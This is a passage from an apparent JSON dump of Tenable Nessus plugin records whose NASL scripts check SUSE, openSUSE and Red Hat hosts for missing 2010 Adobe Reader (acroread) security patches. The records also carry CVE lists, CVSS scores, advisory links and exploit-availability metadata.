value:\"http://support.novell.com/security/cve/CVE-2010-3625.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3626.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3627.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3628.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3629.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3630.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3631.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3632.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3658.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7181.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-cmaps-9.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ja-9.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ko-9.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_CN-9.4-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_TW-9.4-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:08", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-2883, CVE-2010-2884,\nCVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,\nCVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,\nCVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,\nCVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658).", "edition": 24, "published": "2010-10-11T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0706-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2010-10-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_1_ACROREAD-101007.NASL", "href": "https://www.tenable.com/plugins/nessus/49824", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-3275.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49824);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0706-1)\");\n script_summary(english:\"Check for the acroread-3275 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-2883, CVE-2010-2884,\nCVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,\nCVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,\nCVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,\nCVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=638466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-cmaps-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ja-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ko-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-cmaps / acroread-fonts-ja / acroread-fonts-ko / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:35", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-2883, CVE-2010-2884,\nCVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,\nCVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,\nCVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,\nCVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658).", "edition": 24, "published": "2010-10-11T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0706-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2010-10-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_2_ACROREAD-101007.NASL", "href": "https://www.tenable.com/plugins/nessus/49825", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-3275.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49825);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0706-1)\");\n script_summary(english:\"Check for the acroread-3275 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-2883, CVE-2010-2884,\nCVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,\nCVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,\nCVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,\nCVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=638466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-cmaps / acroread-fonts-ja / acroread-fonts-ko / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:16", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security page APSB10-21,\nlisted in the References section.\n\nA specially crafted PDF file could cause Adobe Reader to crash or,\npotentially, execute arbitrary code as the user running Adobe Reader\nwhen opened. (CVE-2010-2883, CVE-2010-2884, CVE-2010-2889,\nCVE-2010-2890, CVE-2010-3619, CVE-2010-3620, CVE-2010-3621,\nCVE-2010-3622, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3632,\nCVE-2010-3658)\n\nAn insecure relative RPATH (runtime library search path) set in some\nAdobe Reader libraries could allow a local attacker, who is able to\nconvince another user to run Adobe Reader in an attacker-controlled\ndirectory, to execute arbitrary code with the privileges of the\nvictim. (CVE-2010-2887)\n\nA specially crafted PDF file could cause Adobe Reader to crash when\nopened. (CVE-2010-3656, CVE-2010-3657)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.4, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "edition": 27, "published": "2010-10-07T00:00:00", "title": "RHEL 4 / 5 : acroread (RHSA-2010:0743)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2010-10-07T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "p-cpe:/a:redhat:enterprise_linux:acroread"], "id": "REDHAT-RHSA-2010-0743.NASL", "href": "https://www.tenable.com/plugins/nessus/49786", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0743. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49786);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n script_bugtraq_id(43057, 43205, 43722, 43723, 43724, 43725, 43726, 43727, 43729, 43730, 43732, 43734, 43735, 43737, 43738, 43740, 43741, 43744, 43746);\n script_xref(name:\"RHSA\", value:\"2010:0743\");\n\n script_name(english:\"RHEL 4 / 5 : acroread (RHSA-2010:0743)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security page APSB10-21,\nlisted in the References section.\n\nA specially crafted PDF file could cause Adobe Reader to crash or,\npotentially, execute arbitrary code as the user running Adobe Reader\nwhen opened. (CVE-2010-2883, CVE-2010-2884, CVE-2010-2889,\nCVE-2010-2890, CVE-2010-3619, CVE-2010-3620, CVE-2010-3621,\nCVE-2010-3622, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,\nCVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3632,\nCVE-2010-3658)\n\nAn insecure relative RPATH (runtime library search path) set in some\nAdobe Reader libraries could allow a local attacker, who is able to\nconvince another user to run Adobe Reader in an attacker-controlled\ndirectory, to execute arbitrary code with the privileges of the\nvictim. (CVE-2010-2887)\n\nA specially crafted PDF file could cause Adobe Reader to crash when\nopened. (CVE-2010-3656, CVE-2010-3657)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.4, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2889\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3625\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3658\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-21.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-21.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0743\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 